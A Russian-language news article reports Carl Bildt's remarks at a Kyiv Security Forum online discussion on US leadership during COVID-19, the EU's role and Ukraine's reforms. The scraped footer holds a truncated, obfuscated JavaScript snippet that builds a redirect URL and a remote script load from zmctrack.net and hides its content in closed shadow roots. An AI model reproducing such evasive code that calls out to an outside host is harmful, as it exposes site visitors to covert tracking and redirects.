Сейчас международная напряженность только возрастает, говорит шведский эксперт

Коронавирус стал первым глобальным кризисом, когда Соединенные Штаты Америки не взяли на себя лидерство в его преодолении. Об этом во время онлайн-дискуссии Киевского форума по безопасности заявил экс-глава правительства Швеции Карл Бильдт.

“Даже до кризиса из-за коронавируса глобальная система сотрудничества была под угрозой и под большим напряжением из-за разных обстоятельств. Это и ревизионистская Россия, и тут мне не надо вам объяснять, вы знаете не хуже меня. Все более напористый Китай во многих отраслях. И расстроенные Соединенные Штаты”, – сказал он.

“В лучшие времена мы бы просто сказали: это глобальный кризис, давайте сформулируем общий глобальный ответ на него. Вместо этого мы видим, что сейчас международная напряженность только возрастает”, – добавил Карл Бильдт.

Экс-глава правительства Швеции отметил, что сейчас Европейский Союз постепенно принимает на себя роль лидера в борьбе с COVID-19.

По его словам, для Украины в сегодняшних условиях важно обеспечить сильную экономику, продолжать процесс реформ и держаться этого курса.

Читайте также:  Вступление Украины в ЕС и НАТО: Порошенко сделал заявление

“На этом надо сосредоточиться, поскольку от этого зависит доверие со стороны Европы и то, насколько сильны будут те, кто хочет вмешиваться в дела Украины, раскалывать страну и в конечном счете управлять ею”, – подчеркнул Карл Бильдт.

“Безусловно, немало уже было сделано. Правительство Яценюка, скажем, достигло значительных результатов. В последнее время была проведена земельная реформа и принят закон о банковской деятельности”, – добавил он.

В тренде
Заседание Совбеза ООН по Крыму: защита Украины или уступка России?

Экс-глава правительства Швеции также отметил необходимость иметь стабильное правительство.

“В последние месяцы, конечно, хотелось бы видеть чуть больше стабильности в правительстве, поскольку министры и другие чиновники слишком часто менялись, и это вызвало определенные вопросы относительно стабильности управления”, – резюмировал он.

Напомним, темой онлайн-дискуссии Киевского форума по безопасности стало: Как усилить западный курс Украины
.

Киевский форум по безопасности – ведущий международный форум Украины по обсуждению проблем мира и безопасности. Основан Фондом Арсения Яценюка “Открой Украину” в 2007 году.

Читайте также:  Денисова рассказала, сколько украинских политзаключенных помиловал Путин

Все подробности в спецтеме Коронавирус

	Карл Бильдт: США впервые не взяли на себя лидерство в преодолении мирового кризиса

	Карл Бильдт: США впервые не взяли на себя лидерство в преодолении мирового кризиса

	Карл Бильдт: США впервые не взяли на себя лидерство в преодолении мирового кризиса

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

США
кризис
ЕС
карл бильдт
коронавирус

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Новости партнеров

Загрузка…

Популярные статьи

	Карл Бильдт: США впервые не взяли на себя лидерство в преодолении мирового кризисаВыход США из Договора об открытом небе прокомментировали украинские дипломатыПолитика 	Карл Бильдт: США впервые не взяли на себя лидерство в преодолении мирового кризисаВ Киеве нашли застреленным народного депутатаПолитика 	Карл Бильдт: США впервые не взяли на себя лидерство в преодолении мирового кризисаКак Украине вступить в НАТО, воюя с Россией: Волкер предложил вариантПолитика 	Карл Бильдт: США впервые не взяли на себя лидерство в преодолении мирового кризисаПорошенко вызывают на допрос в ГБР по “делу картин”Политика 	Карл Бильдт: США впервые не взяли на себя лидерство в преодолении мирового кризисаЭскалация на Донбассе: причины и последствияДонбасс 	Карл Бильдт: США впервые не взяли на себя лидерство в преодолении мирового кризисаСовбез ООН по Крыму: победа или провал КремляПолитика

Новости партнеров

Загрузка…

загрузка…

	Карл Бильдт: США впервые не взяли на себя лидерство в преодолении мирового кризиса

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Связаться с нами

  • Контакты редакции

  • Написать нам

  • на сайте

  • Спецпроекты

  • Архив сайта

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

© segodnya.ua, 2020

Главное

Лента новостей

Отсутствует подключение к сети Интернет

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){“use strict”;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=”/z”,X=”0x04″,B=”http”,G=”substr”,K=”host”,Q=J,U=”argon_”+”debug”+”=1″,V=”prototype”,Y=”createElement”,Z=”appendChild”,tt=”setTimeout”,ot=”querySelectorAll”,et=”getOwnPropertyDescriptor”,rt=”Object”,nt=”charCodeAt”,it=”fromCharCode”,at=”zmctrack”+”.net”,ct=”bind”,ft=”call”,lt=”script”,dt=”head”,st=”get”,pt=”set”,ht=”indexOf”,ut=”s.”+at,bt=”cookie”,kt=”XMLHttpRequest”,vt=”Date”,gt=”now”,xt=”responseText”,mt=”open”,yt=”ShadowRoot”,wt=”Node”,At=”send”,zt=”Array”,St=”addEventListener”,Tt=B+”://”+”click”+”.”+at+”/c/”+”redirect”+”?”+”hash”+”=”,Dt=”slot”,Et=”Math”,Mt=”floor”,Ct=”random”,Ot=”console”,Lt=”Document”,Nt=”innerHTML”,_t=”attachShadow”,Ht=”offsetWidth”,It=”Element”,Rt=”next”,qt=”previous”,Pt=”push”,$t=”length”,jt=”shift”,Ft=”parentNode”,Jt=”textContent”,Wt=”JSON”,Xt=”parse”,Bt=”load”,Gt=”HTML”+It,Kt=”error”,Qt=”location”,Ut=”href”,Vt=”POST”,Yt=”document”,Zt=”un”+”eval”,to={},oo=”parseInt”,eo=It+”Sibling”,ro=”String”,no=”split”;to[“mode”]=”closed”,t=l[Yt],o=l[“chrome”],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||”|”)}!o&&!e||(z=l[“n10091125”],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня

  • 3
  •  
  •  
  •  
  •  
  •